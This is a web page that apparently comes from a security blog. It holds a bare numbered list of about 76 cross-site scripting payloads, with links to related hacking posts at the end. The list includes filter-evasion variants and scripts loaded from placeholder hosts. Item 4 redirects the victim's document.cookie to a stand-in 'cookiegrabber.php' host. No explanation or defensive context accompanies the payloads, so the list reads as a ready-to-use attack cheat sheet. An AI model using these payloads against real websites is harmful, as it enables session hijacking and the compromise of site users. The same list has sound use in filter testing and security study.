1. <script>alert(1);</script>
    2. 
	
  2. <script>alert('XSS');</script>
    3. 
	
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
    4. 
	
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
    5. 
	
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
    6. 
	
  6. <script>alert(String.fromCharCode(88,83,83))</script>
    7. 
	
  7. <img src=foo.png onerror=alert(/xssed/) />
    8. 
	
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
    9. 
	
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
    10. 
	
  10. <marquee><script>alert('XSS')</script></marquee>
    11. 
	
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
    12. 
	
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
    13. 
	
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
    14. 
	
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    15. 
	
  15. "><script>alert(0)</script>
    16. 
	
  16. <script src=http://yoursite.com/your_files.js></script>
    17. 
	
  17. </title><script>alert(/xss/)</script>
    18. 
	
  18. </textarea><script>alert(/xss/)</script>
    19. 
	
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
    20. 
	
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
    21. 
	
  21. <font style='color:expression(alert(document.cookie))'>
    22. 
	
  22. '); alert('XSS
    23. 
	
  23. <img src="javascript:alert('XSS')">
    24. 
	
  24. <script language="JavaScript">alert('XSS')</script>
    25. 
	
  25. [url=javascript:alert('XSS');]click me[/url]
    26. 
	
  26. <body onunload="javascript:alert('XSS');">
    27. 
	
  27. <body onLoad="alert('XSS');"
    28. 
	
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
    29. 
	
  29. "/></a></><img src=1.gif onerror=alert(1)>
    30. 
	
  30. window.alert("Bonjour !");
    31. 
	
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
    32. 
	
  32. alert(String.fromCharCode(88,83,83));'))">
    33. 
	
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
    34. 
	
  34. "><script alert(String.fromCharCode(88,83,83))</script>
    35. 
	
  35. '>><marquee><h1>XSS</h1></marquee>
    36. 
	
  36. '">><script>alert('XSS')</script>
    37. 
	
  37. '">><marquee><h1>XSS</h1></marquee>
    38. 
	
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
    39. 
	
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
    40. 
	
  40. <script>var var = 1; alert(var)</script>
    41. 
	
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
    42. 
	
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
    43. 
	
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
    44. 
	
  44. " onfocus=alert(document.domain) "> <"
    45. 
	
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
    46. 
	
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
    47. 
	
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
    48. 
	
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
    49. 
	
  49. <br size=\"&{alert('XSS')}\">
    50. 
	
  50. <scrscriptipt>alert(1)</scrscriptipt>
    51. 
	
  51. </br style=a:expression(alert())>
    52. 
	
  52. </script><script>alert(1)</script>
    53. 
	
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    54. 
	
  54. [color=red width=expression(alert(123))][color]
    55. 
	
  55. <BASE HREF="javascript:alert('XSS');//">
    56. 
	
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
    57. 
	
  57. "></iframe><script>alert(123)</script>
    58. 
	
  58. <body onLoad="while(true) alert('XSS');">
    59. 
	
  59. '"></title><script>alert(1111)</script>
    60. 
	
  60. </textarea>'"><script>alert(document.cookie)</script>
    61. 
	
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
    62. 
	
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
    63. 
	
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
    64. 
	
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
    65. 
	
  65. '></select><script>alert(123)</script>
    66. 
	
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
    67. 
	
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
    68. 
	
  68. <SCRIPT>document.write("XSS");</SCRIPT>
    69. 
	
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
    70. 
	
  70. ='><script>alert("xss")</script>
    71. 
	
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
    72. 
	
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
    73. 
	
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script   src="http://www.site.com/XSS.js"></script>
    74. 
	
  74.  ">/PlanetCreator/><script>alert(document.cookie)</script>
    75. 
	
  75. src="http://www.site.com/XSS.js">
    76. 
	
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
    77.

Explore More

Blind SQL Injection

Blind injection: you dont actually see anything, you just see how the server responds.Blind injection is a little more complicated/time consuming, but when your injection is multi-select and union isn’t

Read More

Press Conference briefing on the possibility of being shortest man in the world!!!

This is not hacking or security news, just about my some favorite news while I’m arriving at yangon, myanmar. I’ve been here around 3 months and waiting visa approval to

Read More

XSS The Complete Walkthrough

Author: t0pP8uZz Description: Complete tutorial on XSS methods. Homepage: G0t-Root.net, H4cky0u.org, Milw0rm.com Date: 24/07/07 Chapters: What is XSS? Finding XSS Vulnerbilitys The Basics On XSS Deface Methods Cookie Stealing Filteration

Read More